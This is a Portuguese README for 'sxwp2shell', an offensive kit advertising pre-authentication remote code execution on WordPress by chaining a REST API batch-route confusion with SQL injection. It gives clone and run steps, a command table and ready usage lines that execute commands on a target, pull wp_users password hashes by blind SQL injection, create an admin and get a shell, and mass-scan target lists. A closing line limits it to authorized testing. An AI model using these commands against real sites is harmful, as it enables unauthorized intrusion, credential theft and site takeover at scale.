
Kit de exploits RCE pré-autenticação do WordPress wp2shell (CVE-2026-63030 + CVE-2026-60137)
/ ___/___ ____ / /_(_)___ ___ / / | |/ /
\__ \/ _ \/ __ \/ __/ / __ \/ _ \/ / | /
___/ / __/ / / / /_/ / / / / __/ /___/ |
/____/\___/_/ /_/\__/_/_/ /_/\___/_____/_/|_|
sxwp2shell — Exploit de RCE sem autenticação prévia para WordPress via confusão de batch-route da API REST (CVE-2026-63030) + injeção de SQL (CVE-2026-60137).
Afetado: WP 6.9.0–6.9.4 / 7.0.0–7.0.1
git clone https://github.com/SentinelXofficial/sxwp2shell
cd sxwp2shell
chmod +x sxwp2shell.py
Python 3.7+, apenas biblioteca padrão — não é necessário pip install.
| Comando | O que faz |
|---|
check <url> | Detecta versão, endpoint batch, confusão de rota e SQLi |
exploit <url> | Cadeia RCE completa (SQLi → criação de admin → shell) |
read <url> | Extração de dados por SQLi cega |
scan <file> | Varredura em massa de alvos a partir de arquivo, exporta CSV |
python3 sxwp2shell.py check https://target.com
python3 sxwp2shell.py exploit https://target.com --cmd id
python3 sxwp2shell.py read https://target.com --query "SELECT user_pass FROM wp_users"
python3 sxwp2shell.py scan targets.txt -o results.csv
--cmd CMD Comando a executar (padrão: id)
--query QUERY Consulta SQL personalizada
-k, --insecure Ignorar verificação SSL
--proxy PROXY Proxy HTTP
--timeout SEC Tempo limite da requisição (padrão: 15)
--delay SEC Atraso entre requisições
--agent AGENT User-Agent personalizado
--no-color Desativar saída colorida
-o, --output Salvar resultados da varredura em CSV
Apenas para testes de segurança autorizados. Leia DISCLAIMER.md.